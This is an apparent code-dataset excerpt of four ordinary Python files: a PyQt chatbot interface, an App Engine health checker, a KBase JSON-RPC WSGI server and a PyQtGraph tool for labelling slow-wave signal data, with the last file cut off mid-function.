source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
ux.py
|
import sys
import logging
import time
from PyQt5 import QtCore, Qt, QtGui
from PyQt5.QtCore import QThread
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QMainWindow
from emoji import emojize
from sugaroid.brain.constants import emotion_mapping as emotion
from sugaroid.brain.ooo import Emotion
from sugaroid.gui.ui.main import Ui_MainWindow
import threading
class AudioRequests:
"""
Allows sugaroid to simultanously run the
Audio Requests thread as well as the Emotion Changing thread
"""
def __init__(self, parent, ress):
self.parent = parent
self.response = ress
def run(self):
self.parent.parent.tts.speak(self.response)
class EmotionRequests(QThread):
"""
Allows to run the emotion changing thread detached
from the ``__main__`` thread
"""
def __init__(self, parent, emo):
QThread.__init__(self, parent)
self.parent = parent
self.emotion = emo
def run(self):
self.parent.label.setPixmap(
QPixmap(":/home/{}.png".format(emotion[self.emotion]))
)
time.sleep(5)
self.parent.label.setPixmap(QPixmap(":/home/sugaroid.png"))
class BotRequests(QThread):
"""
Allows to ask sugaroid for responses on a detached thread
from the main thread and also spawns ``AudioRequests`` and
``EmotionRequests`` if audio is enabled
"""
def __init__(self, parent):
QThread.__init__(self, parent)
self.parent = parent
def run(self):
text = self.parent.chatbox.text()
self.parent.conv.addItem("you: {}".format(text))
self.parent.chatbox.setText("")
self.parent.conv.scrollToBottom()
response = self.parent.parent.parse(text)
self.parent.conv.addItem("sugaroid: {}".format(emojize(str(response))))
time.sleep(0.1)
if response.emotion != 0:
self.parent.label.setPixmap(
QPixmap(":/home/{}.png".format(emotion[response.emotion]))
)
self.parent.conv.scrollToBottom()
time.sleep(5)
self.parent.label.setPixmap(QPixmap(":/home/sugaroid.png"))
self.parent.conv.scrollToBottom()
if self.parent.parent.audio:
aud = AudioRequests(self.parent, str(response))
y = threading.Thread(target=aud.run)
y.start()
class InterfaceSugaroidQt(QMainWindow, Ui_MainWindow):
"""
Prepares the user interface of Sugaroid on the main
thread and spawns ``BotRequests`` thread on an adjacent
thread
"""
def __init__(self, parent=None):
QMainWindow.__init__(self)
Ui_MainWindow.__init__(self)
self.setupUi(self)
self.sleep = 0
self.sleep_enabled = True
if parent is None:
from sugaroid.sugaroid import Sugaroid
sg = Sugaroid()
self.parent = sg
else:
self.parent = parent
def init(self):
self.push.pressed.connect(self.refresh)
self.chatbox.returnPressed.connect(self.refresh)
self.conv.clear()
self.show()
self.chatbox.setFocus()
def refresh(self):
if str(self.chatbox.text()).isspace():
return
movie = QtGui.QMovie(":/home/sugaroid_thinking3.gif")
self.label.setMovie(movie)
movie.start()
bot = BotRequests(self)
bot.start()
|
health_check_service.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A health checking implementation for the SDK.
<scrub>
This code attempts to match the production implementation as closely as
possible in apphosting/runtime/vm/vm_health_check.cc.
One instance of HealthChecker should be created per instance.Instance that has
health checking enabled. The HealthChecker instance needs to be started, but
will stop itself automatically.
</scrub>
"""
import logging
import threading
import time
from google.appengine.api import request_info
from google.appengine.tools.devappserver2 import start_response_utils
class _HealthCheckState(object):
"""A class to track the state of a health checked instance."""
def __init__(self):
"""Initializes a _HealthCheckState object."""
self.consecutive_healthy_responses = 0
self.consecutive_unhealthy_responses = 0
self.is_last_successful = False
def update(self, healthy):
"""Updates the state.
Args:
healthy: Bool indicating whether the last attempt was healthy.
"""
self.is_last_successful = healthy
if healthy:
self.consecutive_healthy_responses += 1
self.consecutive_unhealthy_responses = 0
else:
self.consecutive_healthy_responses = 0
self.consecutive_unhealthy_responses += 1
def __str__(self):
"""Outputs the state in a readable way for logging."""
tmpl = '{number} consecutive {state} responses.'
if self.consecutive_healthy_responses:
number = self.consecutive_healthy_responses
state = 'HEALTHY'
else:
number = self.consecutive_unhealthy_responses
state = 'UNHEALTHY'
return tmpl.format(number=number, state=state)
class HealthChecker(object):
"""A class to perform health checks for an instance.
This class uses the settings specified in appinfo.HealthCheck and the
callback specified to check the health of the specified instance. When
appropriate, this class changes the state of the specified instance so it is
placed into or taken out of load balancing. This class will also use another
callback to restart the instance, if necessary.
"""
def __init__(self, instance, config, send_request, restart):
"""Initializes a HealthChecker object.
Args:
instance: An instance.Instance object.
config: An appinfo.HealthCheck object.
send_request: A function to call that makes the health check request.
restart: A function to call that restarts the instance.
"""
self._instance = instance
self._config = config
self._send_request = send_request
self._restart = restart
def start(self):
"""Starts the health checks."""
self._instance.set_health(False)
logging.info('Health checks starting for instance %s.',
self._instance.instance_id)
loop = threading.Thread(target=self._loop, name='Health Check')
loop.daemon = True
loop.start()
def _should_continue(self):
return self._running and not self._instance.has_quit
def _loop(self):
"""Performs health checks and updates state over time."""
state = _HealthCheckState()
self._running = True
while self._should_continue():
logging.debug('Performing health check for instance %s.',
self._instance.instance_id)
self._do_health_check(state)
logging.debug('Health check state for instance: %s: %s',
self._instance.instance_id, state)
time.sleep(self._config.check_interval_sec)
def _do_health_check(self, state):
health = self._get_health_check_response(state.is_last_successful)
state.update(health)
self._maybe_update_instance(state)
def _maybe_update_instance(self, state):
"""Performs any required actions on the instance based on the state.
Args:
state: A _HealthCheckState object.
"""
if (state.consecutive_unhealthy_responses >=
self._config.unhealthy_threshold):
self._instance.set_health(False)
elif (state.consecutive_healthy_responses >=
self._config.healthy_threshold):
self._instance.set_health(True)
if (state.consecutive_unhealthy_responses >=
self._config.restart_threshold):
self._restart_instance()
def _get_health_check_response(self, is_last_successful):
"""Sends the health check request and checks the result.
Args:
is_last_successful: Whether the last request was successful.
Returns:
A bool indicating whether or not the instance is healthy.
"""
start_response = start_response_utils.CapturingStartResponse()
try:
response = self._send_request(start_response, is_last_successful)
except request_info.Error:
logging.warning('Health check for instance {instance} is not '
'ready yet.'.format(instance=self._instance.instance_id))
return False
logging.debug('Health check response %s and status %s for instance %s.',
response, start_response.status, self._instance.instance_id)
return start_response.status == '200 OK'
def _restart_instance(self):
"""Restarts the running instance, and stops the current health checker."""
logging.warning('Restarting instance %s because of failed health checks.',
self._instance.instance_id)
self._running = False
self._restart()
|
test_shjchanServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from test_shjchan.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-server-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'test_shjchan'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from test_shjchan.test_shjchanImpl import test_shjchan # noqa @IgnorePep8
impl_test_shjchan = test_shjchan(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'test_shjchan'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_test_shjchan.filter_contigs,
name='test_shjchan.filter_contigs',
types=[dict])
self.method_authentication['test_shjchan.filter_contigs'] = 'required' # noqa
self.rpc_service.add(impl_test_shjchan.status,
name='test_shjchan.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'test_shjchan ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
GuiWindowDocks.py
|
""" Standard imports """
"""
Author: Shameer Sathar
Description: Provide Gui Interface.
"""
import numpy as np
from multiprocessing import Process
# Main GUI support
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui
from pyqtgraph.dockarea import *
import cPickle as pickle
# Locally-developed modules
from TrainingData import TrainingData
from ARFFcsvReader import ARFFcsvReader
from WekaInterface import WekaInterface
from FeatureAnalyser import FeatureAnalyser
from ClassifySlowWavesScikit import ClassifySlowWavesScikit
import config_global as cg
import scipy.io
class GuiWindowDocks:
def __init__(self):
"""
Initialise the properties of the GUI. This part of the code sets the docks, sizes
:return: NULL
"""
self.app = QtGui.QApplication([])
self.win = QtGui.QMainWindow()
area = DockArea()
self.d_control = Dock("Dock Controls", size=(50, 200))
self.d_plot = Dock("Dock Plots", size=(500, 200))
self.d_train = Dock("Training Signal", size=(500, 50))
area.addDock(self.d_control, 'left')
area.addDock(self.d_plot, 'right')
area.addDock(self.d_train, 'bottom', self.d_plot)
self.win.setCentralWidget(area)
self.win.resize(1500, 800)
self.win.setWindowTitle('GUI Training')
self.addDockWidgetsControl()
self.curves_left = []
self.curves_right = []
self.curve_bottom = []
self.addDockWidgetsPlots()
self.setCrosshair()
self.setRectRegionROI()
self.elec = []
self.data = []
self.trainingData = TrainingData()
self.saveBtn_events.clicked.connect(lambda: self.analyse_data())
self.saveBtn_nonEvents.clicked.connect(lambda: self.add_non_events())
self.undoBtn.clicked.connect(lambda: self.undo())
self.analyseBtn.clicked.connect(lambda: self.process_data())
self.readPredictedVal.clicked.connect(lambda: self.read_predicted())
self.analyseInternal.clicked.connect(lambda: self.analyse_internal())
self.save_trained_data.clicked.connect(lambda: self.save_trained())
self.load_trained_data.clicked.connect(lambda: self.load_trained())
self.win.show()
def addDockWidgetsControl(self):
w1 = pg.LayoutWidget()
label = QtGui.QLabel('Usage info')
self.saveBtn_events = QtGui.QPushButton('Save As Events')
self.saveBtn_nonEvents = QtGui.QPushButton('Save As Non-Events')
self.undoBtn = QtGui.QPushButton('Undo')
self.analyseBtn = QtGui.QPushButton('Analyse')
self.readPredictedVal = QtGui.QPushButton('Read Weka CSV')
self.analyseInternal = QtGui.QPushButton('SciKit Analyse')
self.save_trained_data = QtGui.QPushButton('Save Training')
self.load_trained_data = QtGui.QPushButton('Load Training')
w1.addWidget(label, row=0, col=0)
w1.addWidget(self.saveBtn_events, row=1, col=0)
w1.addWidget(self.saveBtn_nonEvents, row=2, col=0)
w1.addWidget(self.undoBtn, row=3, col=0)
w1.addWidget(self.analyseBtn, row=4, col=0)
w1.addWidget(self.readPredictedVal, row=5,col=0)
w1.addWidget(self.analyseInternal, row=6, col=0)
w1.addWidget(self.save_trained_data, row=7, col=0)
w1.addWidget(self.load_trained_data, row=8, col=0)
self.d_control.addWidget(w1, row=1, colspan=1)
def addDockWidgetsPlots(self):
self.w1 = pg.PlotWidget(title="Plots of the slow-wave data")
self.w2 = pg.PlotWidget(title="Plots of zoomed-in slow-wave data")
self.w3 = pg.PlotWidget(title="Selected Data for Training")
c = pg.PlotCurveItem(pen=pg.mkPen('r', width=2))
c_event = pg.PlotCurveItem(pen=pg.mkPen('y', width=2))
self.curve_bottom.append(c)
self.curve_bottom.append(c_event)
self.w3.addItem(c)
self.w3.addItem(c_event)
nPlots =256
for i in range(nPlots):
c1 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
c1.setPos(0, i * 20)
self.curves_left.append(c1)
self.w1.addItem(c1)
self.w1.setYRange(0, 900)
self.w1.setXRange(0, 3000)
c2 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
c2.setPos(0, i * 20)
self.curves_right.append(c2)
self.w2.addItem(c2)
self.s1 = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
self.s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
self.w1.addItem(self.s1)
self.w2.addItem(self.s2)
self.d_plot.addWidget(self.w1, row=0, col=0)
self.d_plot.addWidget(self.w2, row=0, col=1)
self.d_train.addWidget(self.w3, row=0, col=0)
self.proxy = pg.SignalProxy(self.w2.scene().sigMouseMoved, rateLimit=60, slot=self.mouseMoved)
self.w2.scene().sigMouseClicked.connect(self.onClick)
self.w2.sigXRangeChanged.connect(self.updateRegion)
self.w2.sigYRangeChanged.connect(self.updateRegion)
def setCrosshair(self):
"""
Cross hair definition and initiation
"""
self.vLine = pg.InfiniteLine(angle=90, movable=False)
self.hLine = pg.InfiniteLine(angle=0, movable=False)
self.w2.addItem(self.vLine, ignoreBounds=True)
self.w2.addItem(self.hLine, ignoreBounds=True)
def setRectRegionROI(self):
'''
Rectangular selection region
'''
self.rect = pg.RectROI([300, 300], [1500, 100], pen=pg.mkPen(color='y', width=2))
self.w1.addItem(self.rect)
self.rect.sigRegionChanged.connect(self.updatePlot)
def setCurveItem(self, nPlots, nSamples):
for i in range(nPlots):
c1 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
self.w1.addItem(c1)
c1.setPos(0, i * 20)
self.curves_left.append(c1)
self.w1.setYRange(0, 900)
self.w1.setXRange(0, 3000)
self.w1.resize(600, 900)
c2 = pg.PlotCurveItem(pen=(i, nPlots*1.3))
self.w2.addItem(c2)
c2.setPos(0, i * 20)
self.curves_right.append(c2)
self.w2.showGrid(x=True, y=True)
self.w2.resize(600, 900)
self.updatePlot()
def setData(self, data, nPlots, nSize):
self.data = data
self.trainingData.setData(data)
self.setCurveItem(nPlots, nSize)
for i in range(nPlots):
self.curves_left[i].setData(data[i])
self.curves_right[i].setData(data[i])
def updatePlot(self):
xpos = self.rect.pos()[0]
ypos = self.rect.pos()[1]
width = self.rect.size()[0]
height = self.rect.size()[1]
self.w2.setXRange(xpos, xpos+width, padding=0)
self.w2.setYRange(ypos, ypos+height, padding=0)
def updateRegion(self):
xpos = self.w2.getViewBox().viewRange()[0][0]
ypos = self.w2.getViewBox().viewRange()[1][0]
self.rect.setPos([xpos, ypos], update=False)
def mouseMoved(self, evt):
pos = evt[0]
vb = self.w2.plotItem.vb
if self.w2.sceneBoundingRect().contains(pos):
mousePoint = vb.mapSceneToView(pos)
self.vLine.setPos(mousePoint.x())
self.hLine.setPos(mousePoint.y())
def onClick(self, evt):
pos = evt.scenePos()
vb = self.w2.plotItem.vb
if self.w2.sceneBoundingRect().contains(pos):
mousePoint = vb.mapSceneToView(pos)
self.elec.append([int(round(mousePoint.y()/20)), int(round(mousePoint.x()))])
self.trainingData.addRegion([int(round(mousePoint.y()/20)), int(round(mousePoint.x()))])
"""
The binding functions for different gui command buttons.
"""
def analyse_data(self):
self.trainingData.add_events()
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
def add_non_events(self):
self.trainingData.add_non_events()
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
def undo(self):
self.trainingData.undo()
self.curve_bottom[0].setData(self.trainingData.plotDat.flatten()[0:self.trainingData.plotLength])
self.curve_bottom[1].setData(self.trainingData.plotEvent.flatten()[0:self.trainingData.plotLength])
self.w3.setXRange(0, self.trainingData.plotLength, padding=0)
self.w3.setYRange(-10, 10, padding=0)
def read_predicted(self):
filename = QtGui.QFileDialog.getOpenFileName(None, 'Open ARFF WEKA generated output file')
if filename == u'':
return
test = ARFFcsvReader(filename)
prediction = np.asarray(test.get_prediction())
diff = np.diff(prediction)
linear_at = np.array(np.where(diff == 1))
pos = []
length = len(self.data[1])
for val in linear_at.transpose():
pos.append([int(val/length), int(val % length)])
pos_np = np.asarray(pos).transpose()
self.s1.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
self.s2.addPoints(x=pos_np[1], y=(pos_np[0] * 20))
def process_data(self):
test_data = np.reshape(self.data, -1)
data = self.trainingData.plotDat[0][0:self.trainingData.plotLength]
events = self.trainingData.plotEvent[0][0:self.trainingData.plotLength]/5
Process(target=self.process_thread, args=(data, events)).start()
Process(target=self.process_thread, args=[test_data]).start()
def process_thread(self, data, event=None):
training_analyser = FeatureAnalyser()
# FeatureAnalyser requires the 1d data to be passed as array of an array
training_features = training_analyser.process_data([data])
if event is None:
output_name = cg.test_file_name
else:
output_name = cg.training_file_name
weka_write = WekaInterface(training_features, output_name)
weka_write.arff_write(event)
def analyse_internal(self):
self.s1.clear()
self.s2.clear()
# Deal with training data
data = self.trainingData.plotDat[0][0:self.trainingData.plotLength]
events = self.trainingData.plotEvent[0][0:self.trainingData.plotLength]/5
training_analyser = FeatureAnalyser()
training_features_training = training_analyser.process_data([data],(1,self.trainingData.plotLength))
# FeatureAnalyser requires the 1d data to be passed as array of an array
test_data_analyser = FeatureAnalyser()
# FeatureAnalyser requires the 1d data to be passed as array of an array
test_data = np.reshape(self.data, -1)
